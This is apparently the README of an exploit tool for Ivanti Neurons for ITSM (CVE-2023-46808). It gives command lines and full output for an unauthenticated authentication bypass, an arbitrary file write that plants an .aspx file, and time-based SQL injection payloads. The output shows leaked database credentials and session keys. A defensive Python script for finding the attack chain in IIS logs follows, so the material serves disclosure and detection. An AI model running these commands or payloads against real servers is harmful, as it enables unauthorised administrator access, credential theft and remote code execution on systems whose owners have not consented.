synacktiv/itsm-exploit

Exploits for Ivanti Neurons for ITSM (On Premise)

This script exploits several flaws that allow an unauthenticated attacker to gain administrator access and execute remote commands (CVE-2023-46808) on Ivanti Neurons for ITSM (On Premise).

For technical details, see Technical Details

Affected versions

Versions 2021.1.0.2021060601 to 2020.4.0.2021033001 are affected, and earlier versions are likely to be vulnerable as well.

Usage

Install requirements:

pip install requests defusedxml

List tenants

python3 ivanti-itsm-exploit.py  -u http://<target> --list-tenants
[2025-08-10 21:04:18] [*] Listing tenants: http://<target>/HEAT/
[2025-08-10 21:04:18] [*] [+] Tenants found:
- CentralConfig
- WIN-ITSM

Authentication Bypass

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass

[2025-08-10 21:07:43] [*] Bypassing authentication: http://<target>/HEATSurveyProxy/SaaSSurvey.asmx
HTTP RESPONSE:
<?xml version="1.0" ?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
	<soap:Body>
		<AuthenticateAPIResponse xmlns="http://www.frontrange.com/WebSurvey/">
			<AuthenticateAPIResult>
				<TenantId>WIN-ITSM</TenantId>
				<LoginId>HEATAdmin</LoginId>
				<SessionId>OMJC56DSECOCHU6UT9SKGVLP0VLF00U6</SessionId>
				<ConnectionString>server=WIN-ITSM;Integrated Security=False;MultipleActiveResultSets=True;user id=sa;password=Password123;initial catalog=HEATSM</ConnectionString>
				<ProviderName>System.Data.SqlClient</ProviderName>
				<UseServerTimeZone>false</UseServerTimeZone>
				<SessionKey>WIN-ITSM#OMJC56DSECOCHU6UT9SKGVLP0VLF00U6#1</SessionKey>
				<SessionKeyExpire>638915620626330227</SessionKeyExpire>
				<AuthenticationStatus>Success</AuthenticationStatus>
			</AuthenticateAPIResult>
		</AuthenticateAPIResponse>
	</soap:Body>
</soap:Envelope>

[2025-08-10 21:07:43] [+] Database connection string found: server=WIN-ITSM;Integrated Security=False;MultipleActiveResultSets=True;user id=sa;password=Password123;initial catalog=HEATSM
[2025-08-10 21:07:43] [+] Session key (SID) found: WIN-ITSM#OMJC56DSECOCHU6UT9SKGVLP0VLF00U6#1
[2025-08-10 21:07:43] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:07:43] [+] Current role: Admin
[2025-08-10 21:07:43] [+] CSRF Token: lbDMPZLNUCjRdF9tlN8Vry3kr1o

Remote arbitrary file write

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass upload --file a
[...]
[2025-08-10 21:08:55] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:08:55] [+] Current role: Admin
[2025-08-10 21:08:55] [+] CSRF Token: GOjTQIMGuCIwjDEXaw2eU-H_tao
[2025-08-10 21:08:55] [*] Adding file in database
HTTP RESPONSE:
<textarea>{"success":true,"msg":"Your file has been uploaded"}</textarea>
[2025-08-10 21:08:55] [*] Writing file connection id: 95489760790959413597285398825941
HTTP RESPONSE:
{"d":null}
[2025-08-10 21:08:55] [*] Checking file path
HTTP RESPONSE:
{"d":"C:\\\\\\\\Program Files\\\\\\\\HEAT Software\\\\\\\\HEAT\\\\\\\\AppServer\\\\\\\\Input\\WIN-ITSM\\"}
[2025-08-10 21:08:55] [+] Success ! File written at: C:\\\\Program Files\\\\HEAT Software\\\\HEAT\\\\AppServer\\\\Input\WIN-ITSM\
[2025-08-10 21:08:55] [+] File URL: /HEAT/Input/WIN-ITSM/Default.aspx

SQL injection

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass sqli-package --sql "SELECT * from master..syslogins WAITFOR DELAY '0:0:20';"
[...]
[2025-08-10 21:13:37] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:13:37] [+] Current role: Admin
[2025-08-10 21:13:37] [+] CSRF Token: 74652LoPMbH3uy0Rf42lSDn2aoE
[2025-08-10 21:13:37] [*] Exploiting PackageImportHandler.ashx SQLI : http://<target>/HEAT/AdminUI/handlers/PackageImportHandler.ashx
[2025-08-10 21:13:57] [+] Success ! HTTP RESPONSE:
<html><body>{"completed":true,"applied":true,"errors":[],"warnings":[]}<body></html>

Use ITSM as a client for a remote database:

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass sqli-asset --sql "master..syslogins WAITFOR DELAY '0:0:10'--" -u sa -p Password123 -s WIN-ITSM -d ConfigDB
[...]
[2025-08-10 21:14:27] [+] Session key (SID) found: WIN-ITSM#2OK3EV6F3F73L1KM3A0R0G3S5UA05VHR#1
[2025-08-10 21:14:27] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:14:27] [+] Current role: Admin
[2025-08-10 21:14:27] [+] CSRF Token: fnNhibelOJoOxaTihGUd9PG4vXM
[2025-08-10 21:14:27] [*] Exploiting GetAssetXML SQLI : http://<target>/HEAT/AdminUI/services/IntegrationNew.asmx/GetAssetXML
[2025-08-10 21:14:37] [+] Success ! HTTP RESPONSE:
{"d":"Preview failed - SCCMTransformer.GetKeys - Failed to retrieve random key value from SCCM serverSystem.IndexOutOfRangeException: 1\r\n   at System.Data.ProviderBase.FieldNameLookup.GetOrdinal(String fieldName)\r\n   at System.Data.SqlClient.SqlDataReader.GetOrdinal(String name)\r\n   at System.Data.SqlClient.SqlDataReader.get_Item(String name)\r\n   at FrontRange.Integration.Adapter.Container.SCCMContainerBase.GetRandomKey(SCCMAdapterConnectionDef connectionDef)"}
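
Detection

For defenders, the request chain visible in the output above can be searched for in IIS logs. The following is an added example, not part of this repository: it flags a SaaSSurvey.asmx call followed by SelectRole from the same client, .aspx files requested from the Input directory, and slow responses from the two admin handlers. The log field subset, the 60-second window, the 5-second threshold and the sample lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Endpoints named in the tool output on this page (matched case-insensitively).
AUTH = "/heatsurveyproxy/saassurvey.asmx"
ROLE = "/heat/services/session.asmx/selectrole"
SQLI = ("/heat/adminui/handlers/packageimporthandler.ashx",
        "/heat/adminui/services/integrationnew.asmx/getassetxml")
INPUT_ASPX = re.compile(r"^/heat/input/[^/]+/[^/]+\.aspx$")
WINDOW = timedelta(seconds=60)   # assumption: chain completes within a minute
SLOW_MS = 5000                   # assumption: time-taken (ms) treated as delayed

# Constructed sample in IIS W3C format (not real traffic).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status time-taken
2025-08-10 21:07:43 POST /HEATSurveyProxy/SaaSSurvey.asmx 198.51.100.7 200 120
2025-08-10 21:07:43 POST /HEAT/Services/Session.asmx/SelectRole 198.51.100.7 200 45
2025-08-10 21:08:56 GET /HEAT/Input/WIN-ITSM/Default.aspx 198.51.100.7 200 30
2025-08-10 21:13:57 POST /HEAT/AdminUI/handlers/PackageImportHandler.ashx 198.51.100.7 200 20010
2025-08-10 21:20:00 POST /HEAT/Services/Session.asmx/SelectRole 10.0.0.15 200 40
"""

def parse(text):
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # honour the log's own field order
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
            yield row

def detect(text):
    """Return (client_ip, finding) tuples in log order."""
    findings, last_auth = [], {}
    for r in parse(text):
        ip, stem = r["c-ip"], r["cs-uri-stem"].lower()
        if stem == AUTH:
            last_auth[ip] = r["ts"]            # remember when this client hit the survey proxy
        elif stem == ROLE and ip in last_auth and r["ts"] - last_auth[ip] <= WINDOW:
            findings.append((ip, "survey-auth-then-selectrole"))
        elif INPUT_ASPX.match(stem):
            findings.append((ip, "aspx-served-from-input-dir"))
        elif stem in SQLI and int(r["time-taken"]) >= SLOW_MS:
            findings.append((ip, "slow-admin-handler-response"))
    return findings

if __name__ == "__main__":
    print(*detect(SAMPLE_LOG), sep="\n")
```

A SelectRole call on its own, as in the last sample line, is not flagged; only the pairing with the survey proxy endpoint is.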
